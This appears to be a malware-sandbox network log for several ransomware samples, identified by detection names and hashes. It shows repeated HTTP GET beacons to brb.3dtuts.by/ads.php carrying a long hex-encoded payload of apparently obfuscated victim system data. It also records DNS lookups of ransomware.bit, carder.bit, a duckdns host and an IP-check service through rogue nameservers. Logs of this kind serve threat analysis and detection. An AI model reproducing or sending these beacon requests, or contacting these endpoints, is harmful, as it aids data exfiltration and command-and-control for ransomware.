GET /ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603a2e3f32343f3c753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a3528343675160812177519373438303e29753c3e35763f3d6f6d3f6c3a6a683d396d6838693a6c6e6c6e3a6d6e6b3963683a6b626b3d696f3a3e6a39636c6d6d393e6b6b6f3a6f386b3f3a683e69383d62693a3a3d62753e233e60131e0e09760f2934313a3576093a3528343675160812177518292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e60131e0e09760f2934313a3576093a352834367516081217751c3a353f1829222b2f753c3e3576626d696e6f6b6a6c38686b693f3d3a62396f6338383e3a6a623d6e3a6b63623f383f63636b6c3863383a63396e626e6338686c683a6b6f39633a6b6c3e6a383e753e233e60131e0e09760f2934313a3576093a35283436750c323568697519373438303e29753c3e3576696e626d62696d626f6f6a6e6f3d6b6a6f6c6c3d396e6a3d696a3f6f633e3e38686c3d3a63626c6d396a68623a62383a63696268393d386e696c623d3e386f62753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3e353e2932387669623f6c6c383d6a633f3a3a3e633e6d686b6f386d6a3d6238693f3d3f6969393a6a696f6e6c6d3962623e6a626b3a3a68626e6e6969696e3d3a393d6f626d3a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b30397638636b3f3d6b696f3a636c636c693e6e683a6a3f3d6e6b6b6d6a6b6c623e693e626c686d6c68386d633d38636a3f393f3d3f6c623f6263623f3f63696a69396e753e233e600f2934313a3576093a35283436750c3235686975083a3c3e1829222b2f753f2a2a766b3f6f3a3f3e6e3e39696868636d393a38686d6e6b3e3e3f6d3f6c3e6338686a6a3f62383d38686262396e6b6d6c6f3e636f63623a6e6869633838386e633e3a753e233e HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: brb.3dtuts.by
Cache-Control: no-cache

Response

HTTP/1.1 403 Forbidden

Server: nginx
Date: Sat, 09 Nov 2024 19:43:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
DNS

ipv4bot.whatismyipaddress.com

HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe

Remote address:

8.8.8.8:53

Request

ipv4bot.whatismyipaddress.com

IN A

Response
DNS

ns1.wowservers.ru

Remote address:

8.8.8.8:53

Request

ns1.wowservers.ru

IN A

Response

ns1.wowservers.ru

IN A

104.155.138.21

ns1.wowservers.ru

IN A

107.178.223.183
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

ns2.wowservers.ru

Remote address:

8.8.8.8:53

Request

ns2.wowservers.ru

IN A

Response

ns2.wowservers.ru

IN A

107.178.223.183

ns2.wowservers.ru

IN A

104.155.138.21
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

u.lewd.se

HEUR-Trojan-Ransom.Win32.Generic-29d77cf18daae8e6304c61f9c2dfd22ba124576b99e190aa39552225fabf496a.exe

Remote address:

8.8.8.8:53

Request

u.lewd.se

IN A

Response
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

paste.is

HEUR-Trojan-Ransom.Win32.Generic-29d77cf18daae8e6304c61f9c2dfd22ba124576b99e190aa39552225fabf496a.exe

Remote address:

8.8.8.8:53

Request

paste.is

IN A

Response
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
GET

http://brb.3dtuts.by/ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a3528343675160812177519373438303e29753c3e35763f3d6f6d3f6c3a6a683d396d6838693a6c6e6c6e3a6d6e6b3963683a6b626b3d696f3a3e6a39636c6d6d393e6b6b6f3a6f386b3f3a683e69383d62693a3a3d62753e233e60131e0e09760f2934313a3576093a352834367516081217751c3a353f1829222b2f753c3e3576626d696e6f6b6a6c38686b693f3d3a62396f6338383e3a6a623d6e3a6b63623f383f63636b6c3863383a63396e626e6338686c683a6b6f39633a6b6c3e6a383e753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e600f2934313a3576093a35283436750c3235686975083a3c3e1829222b2f753f2a2a766b3f6f3a3f3e6e3e39696868636d393a38686d6e6b3e3e3f6d3f6c3e6338686a6a3f62383d38686262396e6b6d6c6f3e636f63623a6e6869633838386e633e3a753e233e602c3235282d3828753e233e600c36320b292d081e753e233e60292e353f37376869753e233e60333e2e29762f2934313a3576293a3528343675362832377538292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e60131e0e09760f2934313a3576093a3528343675160812177518292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e603528373434302e2b753e233e603834353334282f753e233e

Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe

Remote address:

185.84.108.232:80

Request

GET /ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a3528343675160812177519373438303e29753c3e35763f3d6f6d3f6c3a6a683d396d6838693a6c6e6c6e3a6d6e6b3963683a6b626b3d696f3a3e6a39636c6d6d393e6b6b6f3a6f386b3f3a683e69383d62693a3a3d62753e233e60131e0e09760f2934313a3576093a352834367516081217751c3a353f1829222b2f753c3e3576626d696e6f6b6a6c38686b693f3d3a62396f6338383e3a6a623d6e3a6b63623f383f63636b6c3863383a63396e626e6338686c683a6b6f39633a6b6c3e6a383e753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e600f2934313a3576093a35283436750c3235686975083a3c3e1829222b2f753f2a2a766b3f6f3a3f3e6e3e39696868636d393a38686d6e6b3e3e3f6d3f6c3e6338686a6a3f62383d38686262396e6b6d6c6f3e636f63623a6e6869633838386e633e3a753e233e602c3235282d3828753e233e600c36320b292d081e753e233e60292e353f37376869753e233e60333e2e29762f2934313a3576293a3528343675362832377538292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e60131e0e09760f2934313a3576093a3528343675160812177518292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e603528373434302e2b753e233e603834353334282f753e233e HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: brb.3dtuts.by
Cache-Control: no-cache

Response

HTTP/1.1 403 Forbidden

Server: nginx
Date: Sat, 09 Nov 2024 19:43:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

Remote address:

8.8.8.8:53

Request

hicham9risa.duckdns.org

IN A

Response

hicham9risa.duckdns.org

IN A

192.169.69.25
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
GET

http://brb.3dtuts.by/ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e602c3235282d3828753e233e600c36320b292d081e753e233e60292e353f37376869753e233e60333e2e29762f2934313a3576293a3528343675362832377538292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e6038363f753e233e603834353334282f753e233e60282d3838753e233e600c36320b292d081e753e233e600c36321a2b08292d753e233e600c36320b292d081e753e233e6038363f753e233e603834353334282f753e233e602c323532352f753e233e603528373434302e2b753e233e603834353334282f753e233e

Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe

Remote address:

185.84.108.232:80

Request

GET /ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e602c3235282d3828753e233e600c36320b292d081e753e233e60292e353f37376869753e233e60333e2e29762f2934313a3576293a3528343675362832377538292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e6038363f753e233e603834353334282f753e233e60282d3838753e233e600c36320b292d081e753e233e600c36321a2b08292d753e233e600c36320b292d081e753e233e6038363f753e233e603834353334282f753e233e602c323532352f753e233e603528373434302e2b753e233e603834353334282f753e233e HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: brb.3dtuts.by
Cache-Control: no-cache

Response

HTTP/1.1 403 Forbidden

Server: nginx
Date: Sat, 09 Nov 2024 19:44:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

